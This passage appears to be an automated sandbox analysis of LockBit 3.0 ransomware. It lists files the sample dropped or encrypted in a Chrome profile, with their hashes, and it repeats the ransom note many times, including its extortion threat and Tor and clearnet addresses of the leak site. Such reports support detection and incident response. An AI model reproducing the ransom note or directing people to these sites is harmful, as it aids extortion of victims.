Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\ClientSidePhishing\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):1048834
                Entropy (8bit):4.981936818725884
                Encrypted:false
                SSDEEP:12288:EpGzmXGwFD0QaUty7vTY6THSRlbHn2+6iY0OAk4o:sXGIbsv9TGHnb6j0bo
                MD5:2F8966ECCBC318BA970522D32162D509
                SHA1:122A345E094A150F6F7C5C84FC05CC7AB5822D75
                SHA-256:59F2F5E8E3A0D134A9742D946C3B9929A36FF03FA8EDF2FC47871E744BFDC1F0
                SHA-512:1DFB93D5D8FBAF1A7B0EF3E010E0579F84109FD6FF6470A5CD13611B17DAE5618B8476CF2D693018A33D290814ADC874DF8B35BF49220565CAAC75968CA65262
                Malicious:false
                Preview:.m.......f(.j8..!.U.{v.)q..D.e.....@.....pL....a.G >...d&....U>...&......e.X...&...,.p.-x...k<..`N......kq......v..m.}....9.pv.e.>....Eo.IctWQs ...F.G'.Y/.....P....6Z........Mk.$...L3.l...aA...k?..t.97.&..........A....8.5z**.....Q..6.........g.:..$v.k.AxQ.k.#t.lI1.*......'.@$..S.K.nuNR(7f.@{.....f..!.9S.f...r..w.d..U..v ....M.t....D._..CY...qi...8..6Rw..0.|.h.........}&..5...v...w.FTuxY..6u.9..$..p..w.Q....F..K.e.Pj2..[R.y.N...m.+1..EJ%.c.........=.....~l...R.X.M..F.@.i_%..]]..(...oux......Q8.0..3.2l.[4:......&~/.Z"...7...2W.*!..L....U..E.K.n.~....f.OL..q.s!.1....vA..[.......FE...v..q.B...,LY..+A"..h..l.{({g2/PY..*^,.X..c/..=..'0....mFv.$.S.R.....{...2!.(^...m..!}.............#.. m..Z.2nSL.D...}E]G..$.^..P>`.....3,4%...-.Z1.a.$.{.Nf.........)...F.Hn'..q..N.H....mT.K..7.|!A#..>...-....1&nl^.!.1vP!......eM.=D..`..ctzh.Mn.s>...>e..*n.g.....B15.r....BhD..".6'v..Q.F.!..A.........H...........?i#.K.s.."_}.h...........X;@.S.!.C.4w.OH...,.u.S

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):279
                Entropy (8bit):7.264884965856569
                Encrypted:false
                SSDEEP:6:aP8ZwjOZzgBWJJOTzJWko7t8m0gptmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:kzwJizJWT7t8sD2VJNAWnM+i+9BVzd
                MD5:7E8031D48A21C3E32C3B953E193B151E
                SHA1:CADEA21A9843B3B6C4162913E8B84BB870C61486
                SHA-256:006DA99DC5EE67EF1E2664AA1F0658501F00221C769622FDABF3C13BF3F99A1B
                SHA-512:2E89537E3B0D83B29ADD39767C6241832C92D94E86112691429630929D478E03032F58BFD4E12340C3CA8DC471E386D5A0DD948E76E7EDA38E5D52C9730BBC6F
                Malicious:false
                Preview:..{.C.~....M....[Co.Z.....~!w;.F.qr9....^:.d..X,.#.....)..*..z..;..G.Q.<..0...jp|w..7.P....../........+..4....TV.&..HK.WUv....C.....l..l.i..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:true
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):270566
                Entropy (8bit):7.999305521248763
                Encrypted:true
                SSDEEP:6144:wkc9p43ZqsHHJM2Ua2dsGL2BfGfV23tffFV+WVYrmqNsTJMxgS5tewL:wkcY5nJv2dv2gfV23nUW2rmCmQPL
                MD5:B405BA3A0F6D58BCA8440C59AD5F72E1
                SHA1:51E65E247FEF1EA23A3871D0C7890075218E9785
                SHA-256:FEB1FB9B38434C80DF3B52DB6D360DA9CF7E906D500908520AC6887FCE53BAD2
                SHA-512:094ABE9EEF61612C587DFB9D213B85CE2A0B87D0260F0CAAF1499921C8F293074C2F886A537442F0E51C6ED48A6CB148383831779EB43276A873C485B8074AEC
                Malicious:true
                Preview:.L0.z.Z.....=fg.....r.c*f.w...*C.......l...:.#;..rW.o.s..i.z~.oH7W=T+0'"e.q.:.B..fU..H...Q..e.a..G..H6.|"_.-.....nq;...I........|>b..>.p.A^.e(zV.ql.tG...@3....p..C.Nx...i......OA../R.......8..H.YC.(1.v.....<Yt..!..m=*#l...;~[...j....*U..#Kc8..G.zC.p....tPP. ...}..B..W9Y.9)MUpJx.pM.w.:.8.K..5...P.....q...9.J.z$ .m]..9......r#.b..p....?............5.@....U.*3.XH6....q.....Ci..s1....i.....4u......v.OY..~k.F.....u......X...F._...o7.d...-.J..5......Y.;.......H...m..K*&9.P....g.[......S.O...v(#...../....h..U..)J.Bt.....O.@L.4L...q.]....f....}/.`.W...R..c.0....X....3\..~[g..}..../(..t*D..D..;3/7-.R~.%..%.>....P.lz.lc.$...HGp....8..zRT.T...Y...A&.Y.t9....1'.v.........i.`.|.h{.OG.....e@.t..^<..&Mb......"1^.b.....K4l..m.Wb..W..< .. .!%.Q........t8.kL9&n2.B..8..`.6.! .Q.(bE.1.......,i'.rz&.>......S.....X.<6...y......wk....y..=L..C....,Y...CR.X.A.A`.cL..2.D.!..Pu.X..9..qM. ......{1.n+.(....<.D~..B.0....E.X...z.<?.Iz.=....<...'.y.....$....l..-.(.U

                C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\index.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):262741
                Entropy (8bit):7.999394403893786
                Encrypted:true
                SSDEEP:6144:PflA6QBerx4HjYLDj6dFS/riAUYJ2LY0mNRml2665BD1:326QodCYLDj6dFoxMHQR426G1
                MD5:213AE101A8ADDBC388D960FD65AE9065
                SHA1:D35B6C4006C66EB1A69063DA4A761FFD6B2DD416
                SHA-256:29FED1438581A171B2A62B80A4A90B50AA0EA355B58A0B55B9B4598F934C8881
                SHA-512:9090E0F7FD82FF5DB58753356095239DE362133D9849CAE69E5CF275DCEC2B8251D4F00A63E698E8FC9A06C915FAEA929D5F2CF3ACA4CFA6306177BF3E2E61E4
                Malicious:true
                Preview:.+.l.k..Q..cW^4(...'....._. 9..#I[.d.@.|B........md.Q...D.:1....h.c&a.(A..6T..j!.(....Z,U_?B'.Pf0.W.*....x.m.........'..B.,.q6......l...O..M. .n..n..q.D.....p.v[u...-G)7.a.i.v.H.QF...g....6...2.X.......xA.......l...`.!.`.....Z.....O..oZ.O.-..0.O.).......LK.(.zMI...uj.A..m..........O.~.q....,..,H.o..0V....G....y.4..).I.#...f.. ...j9.J..V..G.......gw.gY.l/.3.O.."...u..B.[.d....g............t...F...cu...V...s.aEP. .F1H...!...O%.yh5..v..a.9..(........?..#....bMw...S.....n.{s...3....mb:)..He....h.?...2....n3...H8^..a.6l*.. $.).z....H.m..]._..Br.Ej.Q.w.P.`r........z2.l|..ZZ..Xp......t.....x.Y..YT.......z.W....2.....D..k...6.Z.|..J1'..V..Hb.cK...d.4....!../.5K....B...S.j...G&O..-...9...Fy..a.A...-.z....X....\E..c.$..FT...{G.<.J(.8........b..Yq.........b..Gl....fR..D5.x.&.X...pwC"6.:.e...5W"..a.gl...}.x..!.:....+z3$n;.....*g.O...#...`./..B..C)..z..l..2A..X:.>9.1......q........n.........z..e.z}..C+.t.....y:%......Q0$..|..{.E

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Browser.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):346
                Entropy (8bit):7.37826586336742
                Encrypted:false
                SSDEEP:6:TG8l/RWj0md5/mcUOggnyBSX394y4CCiMqXvDnjzHrCNtmW2VJzBAWnktNsZVgDa:TGy5C0mqInyMXOCCqXvDnvrCNtD2VJNh
                MD5:7CC331DBE4AF33DBD38C96E391D1DEE0
                SHA1:A33FC1C158B7A6976DD83424DD69A0E5A606D9BA
                SHA-256:E67216A302A684587C219BC813DE1A9504BF529309339A156B633D644BECCCA1
                SHA-512:426E589B88048EF4559FBDF4D8F40BFBE0A6163C0093505D7A8E53E3601733E06E4AFEC30D1DB238E54F9779182B48F2231D6752ECE6A0A939DCD2B989318FBC
                Malicious:false
                Preview:...@.....V.X..I.k...>..}........K..Yl."....sRF....}z......?{.G.D.!....q...I...B..DV...B|..GV.d...7.^>.c-u..6o7.!..%.....b..i.G.Q.?..3........D(H.}..4M.F.B....iu4U...#.{P.L....)=\n.....iX.B.M.......N.j..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Google\Chrome\User Data\Last Version.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):255
                Entropy (8bit):7.15379319159963
                Encrypted:false
                SSDEEP:6:G1e/OUhkmBhrmyT2UGpmW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:G0J/XrmyTzgD2VJNAWnM+i+9BVzd
                MD5:E83A8F7B4C826073B703F77768407A11
                SHA1:977BF877C6609BDA94AB47F9FC61F3653340C8CE
                SHA-256:57295AE74C8FE99B494BE94400CE7A4008129BAD11D2C0CCADA82ECC767C7C68
